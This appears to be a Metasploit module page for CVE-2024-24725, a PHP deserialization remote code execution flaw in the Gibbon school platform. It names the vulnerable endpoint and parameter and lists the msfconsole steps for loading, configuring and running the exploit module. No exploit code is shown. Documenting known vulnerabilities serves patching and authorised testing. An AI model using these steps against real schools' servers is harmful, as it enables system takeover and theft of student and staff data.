A Remote Code Execution vulnerability in Gibbon online school platform version 26.0.00 and lower
allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a
POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.
As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
potentially resulting in complete system compromise, data exfiltration, or unauthorized access
to sensitive information.
msf > use exploit/multi/http/gibbon_auth_rce_cve_2024_24725
msf exploit(gibbon_auth_rce_cve_2024_24725) > show targets
...targets...
msf exploit(gibbon_auth_rce_cve_2024_24725) > set TARGET < target-id >
msf exploit(gibbon_auth_rce_cve_2024_24725) > show options
...show and set options...
msf exploit(gibbon_auth_rce_cve_2024_24725) > exploit